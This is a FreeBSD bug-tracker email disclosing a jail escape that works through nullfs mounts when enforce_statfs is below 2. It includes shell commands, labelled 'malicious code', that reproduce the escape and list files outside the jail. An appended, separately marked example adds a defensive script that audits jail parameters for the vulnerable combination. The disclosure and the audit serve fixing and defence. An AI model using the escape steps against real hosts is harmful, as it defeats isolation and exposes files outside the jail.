Date: Thu, 24 Feb 2022 23:43:32 +0000
From: bugzilla-noreply@freebsd.org
To: bugs@FreeBSD.org
Subject: [Bug 262180] jail escaping via jal-friendly nullfs
Message-ID: <bug-262180-227@https.bugs.freebsd.org/bugzilla/>
https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=262180

    Bug ID:    262180
    Summary:   jail escaping via jal-friendly nullfs
    Product:   Base System
    Version:   12.3-RELEASE
    Hardware:  Any
    OS:        Any
    Status:    New
    Severity:  Affects Some People
    Priority:  ---
    Component: kern
    Assignee:  bugs@FreeBSD.org
    Reporter:  firk@cantconnect.ru

Jail could be escaped when run with enforce_statfs<2, allow.mount=true, allow.mount.nullfs=true.

prepare jail environment
> mkdir /j/1
> tar -c -f - /bin/ lib /libexec /sbin | tar -x -f - -C /j/1
> mkdir /j/1/tmp

start a vulnerable jail
> jail -c path=/j/1 persist=false allow.mount=true allow.mount.nullfs=true enforce_statfs=1 command=/bin/sh

malicious code
> mkdir /tmp/a /tmp/a/b/c /tmp/a/b/c/test /tmp/a/d
> mount -t nullfs /tmp/a/b/c /tmp/a/d
> cd /tmp/a/d/test
> mv /tmp/a/b/c/test /tmp/a/b/test
> ls -al ../../../../..
> ls -al ../../../../../..

you will see the files outside the jail

-- 
You are receiving this mail because:
You are the assignee for the bug.
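
An added example, not part of the bug report or of FreeBSD: a host-side audit that lists jails whose parameters match the combination the report names (enforce_statfs<2 together with allow.mount and allow.mount.nullfs). The function names and the sample lines are constructed, and the parser assumes `jls -n` prints one jail per line with booleans as bare names (`allow.mount`) or with a `no` prefix (`allow.nomount`, `allow.mount.nonullfs`).

```shell
#!/bin/sh
# Added example (hypothetical helper names). On a host: jls -n | audit_jails

# audit_jails: read jail parameter lines on stdin, one jail per line, and
# print the name of every jail that has enforce_statfs below 2 while both
# allow.mount and allow.mount.nullfs are enabled.
audit_jails() {
    awk '
    # A boolean is on when given bare ("allow.mount") or as "allow.mount=true",
    # the form used on the jail command line in the report.
    function on(tok, key) { return tok == key || tok == key "=true" }
    {
        name = "?"; statfs = 2; mnt = 0; nullfs = 0   # enforce_statfs defaults to 2
        for (i = 1; i <= NF; i++) {
            if ($i ~ /^name=/)                name = substr($i, 6)
            else if ($i ~ /^enforce_statfs=/) statfs = substr($i, 16) + 0
            else if (on($i, "allow.mount"))        mnt = 1
            else if (on($i, "allow.mount.nullfs")) nullfs = 1
        }
        if (statfs < 2 && mnt && nullfs) print name
    }'
}

# sample_jls: constructed input in the assumed `jls -n` layout (not real output).
sample_jls() {
    cat <<'EOF'
jid=1 name=build path=/j/1 enforce_statfs=1 allow.mount allow.mount.nullfs
jid=2 name=web path=/j/2 enforce_statfs=2 allow.mount allow.mount.nullfs
jid=3 name=db path=/j/3 enforce_statfs=1 allow.nomount allow.mount.nonullfs
jid=4 name=ci path=/j/4 enforce_statfs=0 allow.mount=true allow.mount.nullfs=true
EOF
}

# Run against the constructed sample; "build" and "ci" match all three conditions.
sample_jls | audit_jails
```

Jails listed by the audit can be reviewed for whether in-jail nullfs mounts are actually needed; the report's condition no longer holds once enforce_statfs is 2 or allow.mount.nullfs is off.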